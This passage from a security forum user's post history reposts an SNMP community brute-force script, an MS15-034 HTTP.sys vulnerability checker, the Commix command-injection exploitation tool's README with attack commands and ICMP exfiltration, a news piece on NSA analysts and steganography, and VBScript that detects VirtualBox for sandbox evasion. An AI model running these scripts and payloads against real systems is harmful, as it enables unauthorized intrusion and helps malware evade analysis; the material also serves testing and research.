ipaddr.index(packet[iP].src) except: return for x in processes: if x.name == ipaddr[pos]: minline[pos] = int((dictline[pos]-(0.05+rtt)/(delay[pos]/1000000.0))+1) if 0 < (0.05+rtt)/(delay[pos]/1000000.0) else 1 maxline[pos] = dictline[pos] if minline[pos] == maxline[pos]: f = open(snmpfile, 'r') g = 1 for lines in f: if g == maxline[pos]: print 'SNMP Community for', ipaddr[pos], 'is:', lines.rstrip() g += 1 else: print '%s snmp community found between line %d and %d in %s. Please wait while narrowing it down.'%(ipaddr[pos], int((dictline[pos]-(0.05+rtt)/(delay[pos]/1000000.0))+1) if 0 < (0.05+rtt)/(delay[pos]/1000000.0) else 1, dictline[pos], snmpfile) stop[pos] == True x.terminate() time.sleep(1) # wait for existing thread to stop dictline[pos] = 1 stop[pos] = False delay[pos] = delay[pos]*5 p = Process(target=snmpscan, name=ipaddr[pos], args=(ipaddr[pos], delay, stop, dictline, pos, minline, maxline)) processes[pos] = p p.start() if __name__ == "__main__": global processes processes = [] dictline = Array('i', [1]*len(ipaddr)) stop = Array('i', [False]*len(ipaddr)) minline = Array('i', [0]*len(ipaddr)) maxline = Array('i', [0]*len(ipaddr)) delay = Array('i', [defaultdelay]*len(ipaddr)) c = 0 for a in ipaddr: p = Process(target=snmpscan, name=a, args=(a, delay, stop, dictline, c, minline, maxline)) processes.append(p) p.start() c += 1 sniff(prn=reply, filter="icmp", store=0) [/TD] [/TR] [/TABLE] Sursa: https://0x41.no/hacking-networks-with-snmp/
  10. Nytro
    Microsoft expands its bug bounty programs to include Azure, Sway, and Project Spartan | VentureBeat | Security | by Emil Protalinski
  11. Nytro
    Se poate scoate butonul de Dislike din AdminCP, rapid.
  12. Nytro
    '''___. .___ __ __ \_ |__ ____ ___.__. ____ ____ __| _// |________ __ __ _______/ |_ | __ \_/ __ < | |/ _ \ / \ / __ |\ __\_ __ \ | \/ ___/\ __\ | \_\ \ ___/\___ ( <_> ) | \/ /_/ | | | | | \/ | /\___ \ | | |___ /\___ > ____|\____/|___| /\____ | |__| |__| |____//____ > |__| \/ \/\/ \/ \/ \/ MS15-034 Checker Danger! This script has not been properly qa'd and will probably fail in terrible ways. It is based off a change in HTTP!UlpParseRange in which an error code is returned as a result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of an HTTP range request. -BF 8a8b2112 56 push esi 8a8b2113 6a00 push 0 8a8b2115 2bc7 sub eax,edi 8a8b2117 6a01 push 1 8a8b2119 1bca sbb ecx,edx 8a8b211b 51 push ecx 8a8b211c 50 push eax 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here ''' import socket import random ipAddr = "" hexAllFfff = "18446744073709551615" req1 = "GET / HTTP/1.0\r\n\r\n" req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n" print " [*] Audit Started" client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect((ipAddr, 80)) client_socket.send(req1) boringResp = client_socket.recv(1024) if "Microsoft" not in boringResp: print " [*] Not IIS" exit(0) client_socket.close() client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect((ipAddr, 80)) client_socket.send(req) goodResp = client_socket.recv(1024) if "Requested Range Not Satisfiable" in goodResp: print "[!!] Looks VULN" elif " The request has an invalid header name" in goodResp: print " [*] Looks Patched" else: print " [*] Unexpected response, cannot discern patch status" Sursa: http://pastebin.com/raw.php?i=ypURDPc4
      • 1
      • Upvote
  13. Nytro
    E misto modulul de fuzzing. Nu face mare lucru, dar luand la mana raspunsurile poate fi foarte util.
  14. Nytro
    Changes: A new attack mode has been added. A completely new fuzzing dialog has been introduced that allows multiple injection points to be attacked at the same time. Various other updates and additions.
  15. Nytro
    Cand am dat eu, probabil si acum: pix si hartie. Si sunt doua parti: Info si Mate.
  16. Nytro
    Ideea era sa faci privilege escalation/bypass UAC. Unde e folder-ul aplicatiei asteia, Program Files sau AppData? Daca e in Program Files, cacat, nu ai drept de scriere acolo ca "normal user". Apoi, aplicatia ruleaza ca Admin? Chiar daca trebuie pornita manual (adica nu la startup) si chiar daca apare promt-ul UAC, acesta o sa fie legitim, dar daca nu, exploit-urile lui "tunis-pula" sunt niste cacaturi inutile.
  17. Nytro
    "unserialize" is magic. In cel mai nasol sens al cuvantului.
  18. Nytro
    __ ___ ___ ___ ___ ___ ___ /\_\ __ _ /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\ /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/> </ \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\ \/____/\/___/ \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ { v0.1b } +-- Automated All-in-One OS Command Injection and Exploitation Tool Copyright © 2015 Anastasios Stasinopoulos (@ancst) +-- General Information Commix (short for [comm]and njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language. Disclaimer The tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes!! Requirements Python version 2.6.x or 2.7.x is required for running this program. Installation Download commix by cloning the Git repository: git clone https://github.com/stasinopoulos/commix.git commix Usage Usage: python commix.py [options] Options -h, --help Show help and exit. --verbose Enable the verbose mode. --install Install 'commix' to your system. --version Show version number and exit. --update Check for updates (apply if any) and exit. Target This options has to be provided, to define the target URL. --url=URL Target URL. --url-reload Reload target URL after command execution. Request These options can be used, to specify how to connect to the target URL. --host=HOST HTTP Host header. --referer=REFERER HTTP Referer header. --user-agent=AGENT HTTP User-Agent header. --cookie=COOKIE HTTP Cookie header. --headers=HEADERS Extra headers (e.g. 'Header1:Value1\nHeader2:Value2'). --proxy=PROXY Use a HTTP proxy (e.g. '127.0.0.1:8080'). --auth-url=AUTH_.. Login panel URL. --auth-data=AUTH.. Login parameters and data. --auth-cred=AUTH.. HTTP Basic Authentication credentials (e.g. 'admin:admin'). Injection These options can be used, to specify which parameters to inject and to provide custom injection payloads. --data=DATA POST data to inject (use 'INJECT_HERE' tag). --suffix=SUFFIX Injection payload suffix string. --prefix=PREFIX Injection payload prefix string. --technique=TECH Specify a certain injection technique : 'classic', 'eval-based', 'time-based' or 'file-based'. --maxlen=MAXLEN The length of the output on time-based technique (Default: 10000 chars). --delay=DELAY Set Time-delay for time-based and file-based techniques (Default: 1 sec). --base64 Use Base64 (enc)/(de)code trick to prevent false- positive results. --tmp-path=TMP_P.. Set remote absolute path of temporary files directory. --icmp-exfil=IP_.. Use the ICMP exfiltration technique (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3'). --alter-shell Use an alternative os-shell (Python). Usage Examples Exploiting Damn Vulnerable Web App python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4" Exploiting php-Charts 1.0 using injection payload suffix & prefix string: python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="//" --suffix="'" Exploiting OWASP Mutillidae using Extra headers and HTTP proxy: python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081" Exploiting Persistence using ICMP exfiltration technique : su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5 Sursa: https://github.com/stasinopoulos/commix
  19. Nytro
    NSA analysts are being paid to watch a LOT of porn Graham Cluley| April 6, 201512:45 am There's been a lot of concern about how intelligence agencies around the world have been covertly snooping on private emails, instant message communications and phone calls, but here's something you may not have realised. They also get to watch a lot of porn. The Daily Beast has the scoop, explaining that CIA and NSA analysts are tasked with examining graphic content that may have been recovered from computers and smartphones during the pursuit of alleged terrorists. Much of this content is retrieved by the NSA's controversial Tailored Access Operations (TAO) group, which said to have infected 50,000 systems around the worldwith malware and even intercepted Microsoft Windows crash error reports. In addition, according to the report, the examined content (which can contain disturbing snuff movies and child abuse images, as well as conventional pornography) is scooped up from "websites frequented by jihadists" and "in some cases" viewed in real-time as it is posted by people of interest. The NSA has reportedly provided its own private viewing room for those employed to watch porn. And it's not all beheading videos. Yes, these snuff films have become vital sources of clues for U.S. intelligence analysts. But vast majority of material these analysts are studying, according to current and former intelligence officials, is a very different sort of NSFW fare. "It's mostly porn," a former intelligence officer who worked on counterterrorism operations, told The Daily Beast. At the headquarters of the NSA in Ft. Meade, Md., another former intelligence officer said, there is a closed room set aside for watching porno clips. One of the reasons that intelligence agencies are checking out the porn videos of terrorists is, apparently, because they are very aware that groups could hide messages within them using steganography. Steganography is the technique of hiding a message within a digital graphic image - making it something that you won't be able to spot with the naked eye. By disguising a message in this way your hope is that anyone intercepting the communication won't realise it's true purpose, meaning it remains a secret until the recipient at the other end runs a program to extract the hidden message. It isn't entirely fanciful to imagine that terrorists might hide secret messages inside porn movies. In 2011, for instance, German police arrested a suspected al-Qaeda member, carrying a memory card. When the memory card was examined, Ars Technica reported in 2012, it was discovered to contain a password-protected folder that (when it eventually revealed its secrets) contained a pornographic video called "KickAss". Later it was determined that the "KickAss" porn flick contained its own secrets, disguised through steganography: Within that video, they discovered 141 separate text files, containing what officials claim are documents detailing al-Qaeda operations and plans for future operations—among them, three entitled "Future Works," "Lessons Learned," and "Report on Operations." Of course, simply watching a blue movie shouldn't be an effective way to tell if it contains data hidden through steganography, if the terrorist is doing their job properly. But I guess the agency would be considered remiss if they didn't have someonetasked with the onerous job of reading every document, checking every image, and watching every minute of video that has been seized. Although the porn angle is likely to generate some sniggers from the back of class, it actually sounds like a ghastly job, with the potential for people to be negatively impacted by some of the more harrowing content they must end up viewing. As such, regardless of whether you approve of some of the methods used by the NSA's TAO unit, it's good to hear that mental health professionals and counsellors are available to workers - who may be disturbed by the content they are paid to view. Side note: This isn't, of course, the first time that intelligence agencies have shown a lot of interest in watching movies of people without their clothes on. The UK's GCHQ spied on more than 1.8 million Yahoo users around the world for six months back in 2008 as part of "Operation Optic Nerve", in a gross invasion of privacy. According to one GCHQ document, between 3 and 11 percent of collected Yahoo webcam images contained sexually explicit content. Which makes me think, there must have been some poor sod whose job it was to count every time someone got nude on their Yahoo webcam chat. That's a pretty awful job too. Sursa: https://grahamcluley.com/2015/04/nsa-porn/
  20. Nytro
    VirtualBox Detection Via WQL Queries Here i have tried to group most of the WMI classes that can be used to detect VirtualBox Virtual Machine. They are as follows: 1) Win32_NetworkAdapterConfiguration (Alias: NICCONFIG) 2) Win32_SystemDriver (Alias: sysdriver) 3) Win32_NTEventLog (Alias: NTEventLog) 4) Win32_BIOS (Alias: bios) 5) Win32_DiskDrive (Alias: diskdrive) 6) Win32_StartupCommand (Alias: Startup) 7) Win32_ComputerSystem (Alias: ComputerSystem) 8) Win32_Service (Alias: service) 9) Win32_LogicalDisk (Alias: LogicalDisk) 10) Win32_LocalProgramGroup) 11) Win32_NetworkAdapter (Alias: NIC) 12) Win32_Process (Alias: process) 13) Win32_BaseBoard (Alias: BaseBoard) 14) Win32_SystemEnclosure (Alias: SystemEnclosure) 15) Win32_CDROMDrive (Alias: cdrom) 16) WIN32_NetworkClient (Alias: netclient) 17) Win32_ComputerSystemProduct (Alias: csproduct) 18) Win32_VideoController 19) Win32_PnPEntity I wrote some simple VBScript code for these WQL queries. Here you can find it. It is very self-explanatory Posted by Walied Assar ' https://twitter.com/waleedassar' http://waliedassar.com/ ' Simple WMI WQL queries for detecting VirtualBox VM's VBoxFound = False set objX = GetObject("winmgmts:\\.\root\cimv2") ' Win32_NetworkAdapterConfiguration aka NICCONFIG Set NicQ = objX.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration") For Each Nic in NicQ if Not IsNull(Nic.MACAddress) And Not IsNull(Nic.Description) Then MacAddress = LCase(CStr(Nic.MACAddress)) Description = LCase(CStr(Nic.Description)) 'We want to detect the VirtualBox guest, not the host If InStr(1,MacAddress,"08:00:27:") = 1 And InStr(1,Description,"virtualbox") = 0 Then WScript.Echo "Win32_NetworkAdapterConfiguration ==> Nic.MACAddress: " & Nic.MACAddress VBoxFound = True End If End If Next 'Win32_SystemDriver aka sysdriver Set SySDrvQ = objX.ExecQuery("SELECT * FROM Win32_SystemDriver") For Each SysDrv in SysDrvQ DescSysDrv = SysDrv.Description DispSysDrv = SysDrv.DisplayName NameSysDrv = SysDrv.Name PathSysDrv = SysDrv.PathName If Not IsNull(DescSysDrv) Then If DescSysDrv = "VirtualBox Guest Driver" Or DescSysDrv = "VirtualBox Guest Mouse Service" Or DescSysDrv = "VirtualBox Shared Folders" Or DescSysDrv = "VBoxVideo" Then WScript.Echo "Win32_SystemDriver ==> SysDrv.Description ==> " & DescSysDrv VBoxFound = True End If End If If Not IsNull(DispSysDrv) Then If DispSysDrv = "VirtualBox Guest Driver" Or DispSysDrv = "VirtualBox Guest Mouse Service" Or DispSysDrv = "VirtualBox Shared Folders" Or DispSysDrv = "VBoxVideo" Then WScript.Echo "Win32_SystemDriver ==> SysDrv.DisplayName ==> " & DispSysDrv VBoxFound = True End If End If If Not IsNull(NameSysDrv) Then If NameSysDrv = "VBoxGuest" Or NameSysDrv = "VBoxMouse" Or NameSysDrv = "VBoxSF" Or NameSysDrv = "VBoxVideo" Then WScript.Echo "Win32_SystemDriver ==> SysDrv.Name ==> " & NameSysDrv VBoxFound = True End If End If If Not IsNull(PathSysDrv) Then PathSysDrv_l = LCase(PathSysDrv) If InStr(1,PathSysDrv_l,"vboxguest.sys") > 0 Or InStr(1,PathSysDrv_l,"vboxmouse.sys") > 0 Or InStr(1,PathSysDrv_l,"vboxsf.sys") > 0 Or InStr(1,PathSysDrv_l,"vboxvideo.sys") > 0 Then WScript.Echo "Win32_SystemDriver ==> SysDrv.PathName ==> " & PathSysDrv VBoxFound = True End If End If Next ' Win32_NTEventLog aka NTEventLog Set EvtLogQ = objX.ExecQuery("SELECT * FROM Win32_NTEventlogFile") For Each EvtLogX In EvtLogQ If Not IsNull(EvtLogX) Then FileNameEvtX = CStr(EvtLogX.FileName) FileNameEvtX_l = LCase(FileNameEvtX) If FileNameEvtX_l = "sysevent" Or FileNameEvtX_l = "system" Then SourcesEvtX = EvtLogX.Sources For Each SourceEvtX in SourcesEvtX SourceEvtX_l = LCase(CStr(SourceEvtX)) If SourceEvtX_l = "vboxvideo" Then WScript.Echo "Win32_NTEventlogFile ==> EvtLogX.Sources ==> " & SourceEvtX VBoxFound = True End If Next End If End If Next ' Win32_BIOS aka bios Set BiosQ = objX.ExecQuery("SELECT * FROM Win32_BIOS") For Each Bios in BiosQ If Not IsNull(Bios) Then If Not IsNull(Bios.Manufacturer) Then ManufacturerBios = LCase(CStr(Bios.Manufacturer)) If InStr(1,ManufacturerBios,"innotek gmbh") > 0 Then WScript.Echo "Win32_BIOS ==> Bios.Manufacturer ==> " & Bios.Manufacturer VBoxFound = True End If End If If Not IsNull(Bios.SMBIOSBIOSVersion) Then SMBIOSBIOSVersionBios = LCase(CStr(Bios.SMBIOSBIOSVersion)) If InStr(1,SMBIOSBIOSVersionBios,"virtualbox") > 0 Then WScript.Echo "Win32_BIOS ==> Bios.SMBIOSBIOSVersion ==> " & Bios.SMBIOSBIOSVersion VBoxFound = True End If End If If Not IsNull(Bios.Version) Then VersionBios = LCase(CStr(Bios.Version)) If InStr(1,VersionBios,"vbox - 1") > 0 Then WScript.Echo "Win32_BIOS ==> Bios.Version ==> " & Bios.Version VBoxFound = True End If End If End If Next ' Win32_DiskDrive aka diskdrive Set DiskDriveQ = objX.ExecQuery("SELECT * FROM Win32_DiskDrive") For Each DiskDrive in DiskDriveQ If Not IsNull(DiskDrive) Then If Not IsNull(DiskDrive.Model) Then ModelDskDrv = LCase(DiskDrive.Model) If ModelDskDrv = "vbox harddisk" Then WScript.Echo "Win32_DiskDrive ==> DiskDrive.Model ==> " & DiskDrive.Model VBoxFound = True End If End If If Not IsNull(DiskDrive.PNPDeviceID) Then PNPDeviceIDDskDrv = LCase(DiskDrive.PNPDeviceID) If InStr(1,PNPDeviceIDDskDrv,"diskvbox") > 0 Then WScript.Echo "Win32_DiskDrive ==> DiskDrive.PNPDeviceID ==> " & DiskDrive.PNPDeviceID VBoxFound = True End If End If End If Next ' Win32_StartupCommand aka Startup Set StartupQ = objX.ExecQuery("SELECT * FROM Win32_StartupCommand") For Each Startup in StartupQ If Not IsNull(Startup) Then If Not IsNull(Startup.Caption) Then CaptionStartup = LCase(CStr(Startup.Caption)) If CaptionStartup = "vboxtray" Then WScript.Echo "Win32_StartupCommand ==> Startup.Caption ==> " & Startup.Caption VBoxFound = True End If End If If Not IsNull(Startup.Command) Then CommandStartup = LCase(CStr(Startup.Command)) If InStr(1,CommandStartup,"vboxtray.exe") > 0 Then WScript.Echo "Win32_StartupCommand ==> Startup.Command ==> " & Startup.Command VBoxFound = True End If End If If Not IsNull(Startup.Description) Then DescStartup = LCase(CStr(Startup.Description)) If DescStartup = "vboxtray" Then WScript.Echo "Win32_StartupCommand ==> Startup.Description ==> " & Startup.Description VBoxFound = True End If End If End If Next 'Win32_ComputerSystem aka ComputerSystem Set ComputerSystemQ = objX.ExecQuery("SELECT * FROM Win32_ComputerSystem") For Each ComputerSystem in ComputerSystemQ If Not IsNull(ComputerSystem) Then If Not IsNull(ComputerSystem.Manufacturer) Then ManufacturerComputerSystem = LCase(CStr(ComputerSystem.Manufacturer)) If ManufacturerComputerSystem = "innotek gmbh" Then WScript.Echo "Win32_ComputerSystem ==> ComputerSystem.Manufacturer ==> " & ComputerSystem.Manufacturer VBoxFound = True End If End If If Not IsNull(ComputerSystem.Model) Then ModelComputerSystem = LCase(CStr(ComputerSystem.Model)) If ModelComputerSystem = "virtualbox" Then WScript.Echo "Win32_ComputerSystem ==> ComputerSystem.Model ==> " & ComputerSystem.Model VBoxFound = True End If End If If Not IsNull(ComputerSystem.OEMStringArray) Then OEMStringArrayComputerSystem = ComputerSystem.OEMStringArray For Each OEM In OEMStringArrayComputerSystem OEM_l = LCase(OEM) If InStr(1,OEM_l,"vboxver_") > 0 Or InStr(1,OEM_l,"vboxrev_") > 0 Then WScript.Echo "Win32_ComputerSystem ==> ComputerSystem.OEMStringArray ==> " & OEM VBoxFound = True End If Next End If End If Next 'Win32_Service aka service Set ServiceQ = objX.ExecQuery("SELECT * FROM Win32_Service") For Each Service in ServiceQ If Not IsNull(Service) Then If Not IsNull(Service.Caption) Then CaptionService = LCase(CStr(Service.Caption)) If CaptionService = "virtualbox guest additions service" Then WScript.Echo "Win32_Service ==> Service.Caption ==> " & Service.Caption VBoxFound = True End If End If If Not IsNull(Service.DisplayName) Then DisplayNameService = LCase(CStr(Service.DisplayName)) If DisplayNameService = "virtualbox guest additions service" Then WScript.Echo "Win32_Service ==> Service.DisplayName ==> " & Service.DisplayName VBoxFound = True End If End If If Not IsNull(Service.Name) Then NameService = LCase(CStr(Service.Name)) If NameService = "vboxservice" Then WScript.Echo "Win32_Service ==> Service.Name ==> " & Service.Name VBoxFound = True End If End If If Not IsNull(Service.PathName) Then PathNameService = LCase(CStr(Service.PathName)) If InStr(1,PathNameService,"vboxservice.exe") > 0 Then WScript.Echo "Win32_Service ==> Service.PathName ==> " & Service.PathName VBoxFound = True End If End If End If Next 'Win32_LogicalDisk aka LogicalDisk Set LogicalDiskQ = objX.ExecQuery("SELECT * FROM Win32_LogicalDisk") For Each LogicalDisk in LogicalDiskQ If Not IsNull(LogicalDisk) Then If Not IsNull(LogicalDisk.DriveType) Then If LogicalDisk.DriveType = 3 Then If Not IsNull(LogicalDisk.VolumeSerialNumber) Then VolumeSerialNumberLogicalDisk = LCase(LogicalDisk.VolumeSerialNumber) If VolumeSerialNumberLogicalDisk = "fceae0a3" Then WScript.Echo "Win32_LogicalDisk ==> LogicalDisk.VolumeSerialNumber ==> " & LogicalDisk.VolumeSerialNumber VBoxFound = True End If End If ElseIf LogicalDisk.DriveType = 5 Then If Not IsNull(LogicalDisk.VolumeName) Then VolumeNameLogicalDisk = LCase(LogicalDisk.VolumeName) 'Volume name should be "VBOXADDITIONS_4." If InStr(1,VolumeNameLogicalDisk,"vboxadditions") > 0 Then WScript.Echo "Win32_LogicalDisk ==> LogicalDisk.VolumeName ==> " & LogicalDisk.VolumeName VBoxFound = True End If End If End If End If End If Next 'Win32_LocalProgramGroup Set LogicalProgramGroupQ = objX.ExecQuery("SELECT * FROM Win32_LogicalProgramGroup") For Each LocalProgramGroup in LogicalProgramGroupQ If Not IsNull(LocalProgramGroup) Then NameLocalProgramGroup = LCase(LocalProgramGroup.Name) If InStr(1,NameLocalProgramGroup,"oracle vm virtualbox guest additions") > 0 Then WScript.Echo "Win32_LogicalProgramGroup ==> LocalProgramGroup.Name ==> " & LocalProgramGroup.Name VBoxFound = True End If End If Next 'Win32_NetworkAdapter aka NIC Set NicQQ = objX.ExecQuery("SELECT * FROM Win32_NetworkAdapter") For Each NIC_x in NicQQ if Not IsNull(NIC_x.MACAddress) And Not IsNull(NIC_x.Description) Then MacAddress_x = LCase(CStr(NIC_x.MACAddress)) Description_x = LCase(CStr(NIC_x.Description)) 'We want to detect the VirtualBox guest, not the host If InStr(1,MacAddress_x,"08:00:27:") = 1 And InStr(1,Description_x,"virtualbox") = 0 Then WScript.Echo "Wow: Win32_NetworkAdapter ==> NIC.MacAddress: " & NIC_x.MACAddress VBoxFound = True End If End If Next 'Win32_Process aka process Set ProcessQ = objX.ExecQuery("SELECT * FROM Win32_Process") For Each Process in ProcessQ If Not IsNull(Process) Then If Not IsNull(Process.Description) Then DescProcess = LCase(Process.Description) If DescProcess = "vboxservice.exe" Or DescProcess = "vboxtray.exe" Then WScript.Echo "Win32_Process ==> Process.Description ==> " & Process.Description VBoxFound = True End If End If If Not IsNull(Process.Name) Then NameProcess = LCase(Process.Name) If NameProcess = "vboxservice.exe" Or NameProcess = "vboxtray.exe" Then WScript.Echo "Win32_Process ==> Process.Name ==> " & Process.Name VBoxFound = True End If End If If Not IsNull(Process.CommandLine) Then CmdProcess = LCase(Process.CommandLine) If InStr(1,CmdProcess,"vboxservice.exe") > 0 OR InStr(1,CmdProcess,"vboxtray.exe") > 0 Then WScript.Echo "Win32_Service ==> Process.CommandLine ==> " & Process.CommandLine VBoxFound = True End If End If If Not IsNull(Process.ExecutablePath) Then ExePathProcess = LCase(Process.ExecutablePath) If InStr(1,ExePathProcess,"vboxservice.exe") > 0 OR InStr(1,ExePathProcess,"vboxtray.exe") > 0 Then WScript.Echo "Win32_Service ==> Process.ExecutablePath ==> " & Process.ExecutablePath VBoxFound = True End If End If End If Next 'Win32_BaseBoard aka BaseBoard Set BaseBoardQ = objX.ExecQuery("SELECT * FROM Win32_BaseBoard") For Each BaseBoard in BaseBoardQ If Not IsNull(BaseBoard) Then If Not IsNull(BaseBoard.Manufacturer) Then ManufacturerBaseBoard = LCase(BaseBoard.Manufacturer) If ManufacturerBaseBoard = "oracle corporation" Then WScript.Echo "Win32_BaseBoard ==> BaseBoard.Manufacturer ==> " & BaseBoard.Manufacturer VBoxFound = True End If End If If Not IsNull(BaseBoard.Product) Then ProductBaseBoard = LCase(BaseBoard.Product) If ProductBaseBoard = "virtualbox" Then WScript.Echo "Win32_BaseBoard ==> BaseBoard.Product ==> " & BaseBoard.Product VBoxFound = True End If End If End If Next 'Win32_SystemEnclosure aka SystemEnclosure Set SystemEnclosureQ = objX.ExecQuery("SELECT * FROM Win32_SystemEnclosure") For Each SystemEnclosure in SystemEnclosureQ If Not IsNull(SystemEnclosure) Then If Not IsNull(SystemEnclosure.Manufacturer) Then ManufacturerSystemEnclosure = LCase(SystemEnclosure.Manufacturer) If ManufacturerSystemEnclosure = "oracle corporation" Then WScript.Echo "Win32_SystemEnclosure ==> SystemEnclosure.Manufacturer ==> " & SystemEnclosure.Manufacturer VBoxFound = True End If End If End If Next 'Win32_CDROMDrive aka cdrom Set CDRomQ = objX.ExecQuery("SELECT * FROM Win32_CDROMDrive") For Each CDRom in CDRomQ If Not IsNull(CDRom) Then If Not IsNull(CDRom.Name) Then NameCDRom = LCase(CDRom.Name) If NameCDRom = "vbox cd-rom" Then WScript.Echo "Win32_CDROMDrive ==> CDRom.Name ==> " & CDRom.Name VBoxFound = True End If End If If Not IsNull(CDRom.VolumeName) Then VolumeNameCDRom = LCase(CDRom.VolumeName) 'Volume name should be "VBOXADDITIONS_4." If InStr(1,VolumeNameCDRom,"vboxadditions") > 0 Then WScript.Echo "Win32_CDROMDrive ==> CDRom.VolumeName ==> " & CDRom.VolumeName VBoxFound = True End If End If If Not IsNull(CDRom.DeviceID) Then DeviceIDCDRom = LCase(CDRom.DeviceID) If InStr(1,DeviceIDCDRom,"cdromvbox") > 0 Then WScript.Echo "Win32_CDROMDrive ==> CDRom.DeviceID ==> " & CDRom.DeviceID VBoxFound = True End If End If If Not IsNull(CDRom.PNPDeviceID) Then PNPDeviceIDCDRom = LCase(CDRom.PNPDeviceID) If InStr(1,PNPDeviceIDCDRom,"cdromvbox") > 0 Then WScript.Echo "Win32_CDROMDrive ==> CDRom.PNPDeviceID ==> " & CDRom.PNPDeviceID VBoxFound = True End If End If End If Next 'WIN32_NetworkClient aka netclient Set NetClientQ = objX.ExecQuery("SELECT * FROM WIN32_NetworkClient") For Each NetClient in NetClientQ If Not IsNull(NetClient) Then If Not IsNull(NetClient.Description) Then DescNetClient = LCase(NetClient.Description) If DescNetClient = "vboxsf" Then WScript.Echo "WIN32_NetworkClient ==> NetClient.Description ==> " & NetClient.Description VBoxFound = True End If End If If Not IsNull(NetClient.Manufacturer) Then ManufacturerNetClient = LCase(NetClient.Manufacturer) If ManufacturerNetClient = "oracle corporation" Then WScript.Echo "WIN32_NetworkClient ==> NetClient.Manufacturer ==> " & NetClient.Manufacturer VBoxFound = True End If End If If Not IsNull(NetClient.Name) Then NameNetClient = LCase(NetClient.Name) If NameNetClient = "virtualbox shared folders" Then WScript.Echo "WIN32_NetworkClient ==> NetClient.Name ==> " & NetClient.Name VBoxFound = True End If End If End If Next 'Win32_ComputerSystemProduct aka csproduct Set CSProductQ = objX.ExecQuery("SELECT * FROM Win32_ComputerSystemProduct") For Each CSProduct in CSProductQ If Not IsNull(CSProduct) Then If Not IsNull(CSProduct.Name) Then NameCSProduct = LCase(CSProduct.Name) If NameCSProduct = "virtualbox" Then WScript.Echo "Win32_ComputerSystemProduct ==> CSProduct.Name ==> " & CSProduct.Name VBoxFound = True End If End If If Not IsNull(CSProduct.Vendor) Then VendorCSProduct = LCase(CSProduct.Vendor) If VendorCSProduct = "innotek gmbh" Then WScript.Echo "Win32_ComputerSystemProduct ==> CSProduct.Vendor ==> " & CSProduct.Vendor VBoxFound = True End If End If End If Next 'Win32_VideoController Set VideoControllerQ = objX.ExecQuery("SELECT * FROM Win32_VideoController") For Each VideoController in VideoControllerQ If Not IsNull(VideoController) Then If Not IsNull(VideoController.Name) Then NameVideoController = LCase(VideoController.Name) If NameVideoController = "virtualbox graphics adapter" Then WScript.Echo "Win32_VideoController ==> VideoController.Name ==> " & VideoController.Name VBoxFound = True End If End If If Not IsNull(VideoController.Description) Then DescVideoController = LCase(VideoController.Description) If DescVideoController = "virtualbox graphics adapter" Then WScript.Echo "Win32_VideoController ==> VideoController.Description ==> " & VideoController.Description VBoxFound = True End If End If If Not IsNull(VideoController.Caption) Then CaptionVideoController = LCase(VideoController.Caption) If CaptionVideoController = "virtualbox graphics adapter" Then WScript.Echo "Win32_VideoController ==> VideoController.Caption ==> " & VideoController.Caption VBoxFound = True End If End If If Not IsNull(VideoController.VideoProcessor) Then VideoProcessorVideoController = LCase(VideoController.VideoProcessor) If VideoProcessorVideoController = "vbox" Then WScript.Echo "Win32_VideoController ==> VideoController.VideoProcessor ==> " & VideoController.VideoProcessor VBoxFound = True End If End If If Not IsNull(VideoController.InstalledDisplayDrivers) Then InstalledDisplayDriversVideoController = LCase(VideoController.InstalledDisplayDrivers) If InstalledDisplayDriversVideoController = "vboxdisp.sys" Then WScript.Echo "Win32_VideoController ==> VideoController.InstalledDisplayDrivers ==> " & VideoController.InstalledDisplayDrivers VBoxFound = True End If End If If Not IsNull(VideoController.InfSection) Then InfSectionVideoController = LCase(VideoController.InfSection) If InfSectionVideoController = "vboxvideo" Then WScript.Echo "Win32_VideoController ==> VideoController.InfSection ==> " & VideoController.InfSection VBoxFound = True End If End If If Not IsNull(VideoController.AdapterCompatibility) Then AdapterCompatibilityVideoController = LCase(VideoController.AdapterCompatibility) If AdapterCompatibilityVideoController = "oracle corporation" Then WScript.Echo "Win32_VideoController ==> VideoController.AdapterCompatibility ==> " & VideoController.AdapterCompatibility VBoxFound = True End If End If End If Next 'Win32_PnPEntity Set PnPEntityQ = objX.ExecQuery("SELECT * FROM Win32_PnPEntity") For Each PnPEntity in PnPEntityQ If Not IsNull(PnPEntity) Then If Not IsNull(PnPEntity.Name) Then NamePnPEntity = LCase(PnPEntity.Name) If NamePnPEntity = "virtualbox device" Or NamePnPEntity = "vbox harddisk" Or NamePnPEntity = "vbox cd-rom" Or NamePnPEntity = "virtualbox graphics adapter" Then WScript.Echo "Win32_PnPEntity ==> PnPEntity.Name ==> " & PnPEntity.Name VBoxFound = True End If End If If Not IsNull(PnPEntity.Caption) Then CaptionPnPEntity = LCase(PnPEntity.Caption) If CaptionPnPEntity = "virtualbox device" Or CaptionPnPEntity = "vbox harddisk" Or CaptionPnPEntity = "vbox cd-rom" Or CaptionPnPEntity = 